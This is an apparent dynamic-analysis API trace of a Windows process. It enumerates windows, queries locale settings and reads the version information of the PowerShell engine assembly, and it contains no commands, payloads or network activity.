	[0947.559] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xfcc
	[0947.559] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x12ac
	[0947.559] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1484
	[0947.559] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x934
	[0947.559] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xc0c
	[0947.560] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xb08
	[0947.560] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x948
	[0947.560] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1178
	[0947.560] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x13e0
	[0947.560] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xcd0
	[0947.560] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x13fc
	[0947.560] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xdc8
	[0947.560] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xc18
	[0947.560] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xc2c
	[0947.560] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xa1c
	[0947.560] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1244
	[0947.561] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xdb0
	[0947.561] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1398
	[0947.561] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1358
	[0947.561] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1370
	[0947.561] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1340
	[0947.561] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x130c
	[0947.561] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x12c0
	[0947.561] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x12e4
	[0947.561] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1270
	[0947.561] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1298
	[0947.562] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x120c
	[0947.562] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x122c
	[0947.562] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x11c4
	[0947.562] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x11b0
	[0947.562] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1188
	[0947.562] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1148
	[0947.562] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1160
	[0947.562] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x10fc
	[0947.562] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xe34
	[0947.563] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xea4
	[0947.563] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x514
	[0947.563] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xe48
	[0947.563] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xbc8
	[0947.563] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xdf8
	[0947.563] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x318
	[0947.563] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xcac
	[0947.563] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x8bc
	[0947.563] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xf9c
	[0947.564] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xf48
	[0947.564] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xe40
	[0947.564] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xecc
	[0947.564] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xeb8
	[0947.564] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xe80
	[0947.564] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xe98
	[0947.564] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xe60
	[0947.564] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xee4
	[0947.564] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xf00
	[0947.564] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xdf0
	[0947.565] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xe1c
	[0947.565] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xdd0
	[0947.565] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xd94
	[0947.565] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xd74
	[0947.565] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xd00
	[0947.565] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xcd8
	[0947.565] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xc84
	[0947.565] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xca4
	[0947.565] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xc64
	[0947.565] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xc24
	[0947.566] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xb84
	[0947.566] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xbac
	[0947.566] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x384
	[0947.566] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xab8
	[0947.566] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x33c
	[0947.566] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xa44
	[0947.566] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xa64
	[0947.566] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x8a8
	[0947.566] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xaf0
	[0947.566] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x88c
	[0947.567] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xb04
	[0947.567] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x910
	[0947.567] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x230
	[0947.567] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xac0
	[0947.567] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xab4
	[0947.567] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xaac
	[0947.567] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x3d0
	[0947.567] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x978
	[0947.567] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xa7c
	[0947.567] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x59c
	[0947.568] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xa88
	[0947.568] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xa6c
	[0947.568] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xa68
	[0947.568] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x9f8
	[0947.568] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xa04
	[0947.568] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x924
	[0947.568] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x8dc
	[0947.568] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x7dc
	[0947.568] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x768
	[0947.568] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x764
	[0947.568] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x820
	[0947.569] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x810
	[0947.569] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x794
	[0947.569] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x83c
	[0947.569] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x7ac
	[0947.569] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xb44
	[0947.569] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x6bc
	[0947.569] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0xb5c
	[0947.569] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x838
	[0947.569] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4d0
	[0947.569] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4d0
	[0947.570] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4d0
	[0947.570] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4d0
	[0947.570] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4d0
	[0947.570] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4d0
	[0947.570] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4d0
	[0947.570] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x4d0
	[0947.570] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x818
	[0947.570] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x5b8
	[0947.570] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x494
	[0947.570] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x1ec
	[0947.571] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x440
	[0947.571] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x7e8
	[0947.571] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x730
	[0947.571] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x2c8
	[0947.571] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x26dd40 | out: lpdwProcessId=0x26dd40) returned 0x31c
	[0947.575] WerSetFlags () returned 0x0
	[0948.279] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0948.280] CoTaskMemFree (pv=0x0) 
	[0948.281] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x26e0a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x26e0a0 | out: pulNumLanguages=0x26e0a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x26e0a0) returned 1
	[0948.281] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x26e0a8, pwszLanguagesBuffer=0x2eaf5f0, pcchLanguagesBuffer=0x26e0a0 | out: pulNumLanguages=0x26e0a8, pwszLanguagesBuffer=0x2eaf5f0, pcchLanguagesBuffer=0x26e0a0) returned 1
	[0948.286] CoTaskMemAlloc (cb=0x24) returned 0x45fc50
	[0948.286] GetUserDefaultLocaleName (in: lpLocaleName=0x45fc50, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0948.286] CoTaskMemFree (pv=0x45fc50) 
	[0950.549] CoTaskMemAlloc (cb=0x104) returned 0x4309c0
	[0950.549] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4309c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0950.549] CoTaskMemFree (pv=0x4309c0) 
	[0950.551] CoTaskMemAlloc (cb=0x104) returned 0x4309c0
	[0950.551] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4309c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0950.551] CoTaskMemFree (pv=0x4309c0) 
	[0950.553] CoTaskMemAlloc (cb=0x104) returned 0x4309c0
	[0950.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4309c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0950.553] CoTaskMemFree (pv=0x4309c0) 
	[0950.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0950.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0950.561] SetErrorMode (uMode=0x1) returned 0x1
	[0950.562] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x26dd20 | out: lpFileInformation=0x26dd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0950.562] SetErrorMode (uMode=0x1) returned 0x1
	[0950.562] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x26df90 | out: lpdwHandle=0x26df90) returned 0x94c
	[0950.563] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2eb2e80 | out: lpData=0x2eb2e80) returned 1
	[0950.564] VerQueryValueW (in: pBlock=0x2eb2e80, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26df08, puLen=0x26df00 | out: lplpBuffer=0x26df08*=0x2eb2f1c, puLen=0x26df00) returned 1
	[0950.564] VerQueryValueW (in: pBlock=0x2eb2e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x26de78, puLen=0x26de70 | out: lplpBuffer=0x26de78*=0x2eb2ff8, puLen=0x26de70) returned 1
	[0950.564] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0950.564] CoTaskMemAlloc (cb=0x2e) returned 0x45a460
	[0950.564] lstrcpyW (in: lpString1=0x45a460, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0950.564] CoTaskMemFree (pv=0x45a460) 
	[0950.564] VerQueryValueW (in: pBlock=0x2eb2e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x26de78, puLen=0x26de70 | out: lplpBuffer=0x26de78*=0x2eb304c, puLen=0x26de70) returned 1
	[0950.564] lstrlenW (lpString="System.Management.Automation") returned 28
	[0950.564] CoTaskMemAlloc (cb=0x3c) returned 0x3d8f10
	[0950.564] lstrcpyW (in: lpString1=0x3d8f10, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0950.564] CoTaskMemFree (pv=0x3d8f10) 
	[0950.564] VerQueryValueW (in: pBlock=0x2eb2e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x26de78, puLen=0x26de70 | out: lplpBuffer=0x26de78*=0x2eb30a8, puLen=0x26de70) returned 1
	[0950.564] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0950.564] CoTaskMemAlloc (cb=0x20) returned 0x45fcb0
	[0950.564] lstrcpyW (in: lpString1=0x45fcb0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0950.564] CoTaskMemFree (pv=0x45fcb0) 
	[0950.564] VerQueryValueW (in: pBlock=0x2eb2e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x26de78, puLen=0x26de70 | out: lplpBuffer=0x26de78*=0x2eb30e8, puLen=0x26de70) returned 1
	[0950.564] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0950.564] CoTaskMemAlloc (cb=0x44) returned 0x3d8f10
	[0950.564] lstrcpyW (in: lpString1=0x3d8f10, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0950.564] CoTaskMemFree (pv=0x3d8f10) 
	[0950.564] VerQueryValueW (in: pBlock=0x2eb2e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x26de78, puLen=0x26de70 | out: lplpBuffer=0x26de78*=0x2eb3150, puLen=0x26de70) returned 1
	[0950.564] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0950.564] CoTaskMemAlloc (cb=0x76) returned 0x3fd3f0
	[0950.564] lstrcpyW (in: lpString1=0x3fd3f0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0950.565] CoTaskMemFree (pv=0x3fd3f0) 
	[0950.565] VerQueryValueW (in: pBlock=0x2eb2e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x26de78, puLen=0x26de70 | out: lplpBuffer=0x26de78*=0x2eb31ec, puLen=0x26de70) returned 1
	[0950.565] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0950.565] CoTaskMemAlloc (cb=0x44) returned 0x3d8f10
	[0950.565] lstrcpyW (in: lpString1=0x3d8f10, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0950.565] CoTaskMemFree (pv=0x3d8f10) 
	[0950.565] VerQueryValueW (in: pBlock=0x2eb2e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x26de78, puLen=0x26de70 | out: lplpBuffer=0x26de78*=0x2eb3250, puLen=0x26de70) returned 1
	[0950.565] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0950.565] CoTaskMemAlloc (cb=0x58) returned 0x3b59b0
	[0950.565] lstrcpyW (in: lpString1=0x3b59b0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0950.565] CoTaskMemFree (pv=0x3b59b0) 
	[0950.565] VerQueryValueW (in: pBlock=0x2eb2e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x26de78, puLen=0x26de70 | out: lplpBuffer=0x26de78*=0x2eb32cc, puLen=0x26de70) returned 1
	[0950.565] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0950.565] CoTaskMemAlloc (cb=0x20) returned 0x45fcb0
	[0950.565] lstrcpyW (in: lpString1=0x45fcb0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0950.565] CoTaskMemFree (pv=0x45fcb0) 
	[0950.565] VerQueryValueW (in: pBlock=0x2eb2e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x26de78, puLen=0x26de70 | out: lplpBuffer=0x26de78*=0x2eb2f74, puLen=0x26de70) returned 1
	[0950.565] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0950.565] CoTaskMemAlloc (cb=0x66) returned 0x45e460
	[0950.565] lstrcpyW (in: lpString1=0x45e460, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0950.565] CoTaskMemFree (pv=0x45e460) 
	[0950.565] VerQueryValueW (in: pBlock=0x2eb2e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x26de78, puLen=0x26de70 | out: lplpBuffer=0x26de78*=0x0, puLen=0x26de70) returned 0
	[0950.565] VerQueryValueW (in: pBlock=0x2eb2e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x26de78, puLen=0x26de70 | out: lplpBuffer=0x26de78*=0x0, puLen=0x26de70) returned 0
	[0950.565] VerQueryValueW (in: pBlock=0x2eb2e80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x26de78, puLen=0x26de70 | out: lplpBuffer=0x26de78*=0x0, puLen=0x26de70) returned 0
	[0950.565] VerQueryValueW (in: pBlock=0x2eb2e80, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26de48, puLen=0x26de40 | out: lplpBuffer=0x26de48*=0x2eb2f1c, puLen=0x26de40) returned 1
	[0950.565] CoTaskMemAlloc (cb=0x204) returned 0x401a60
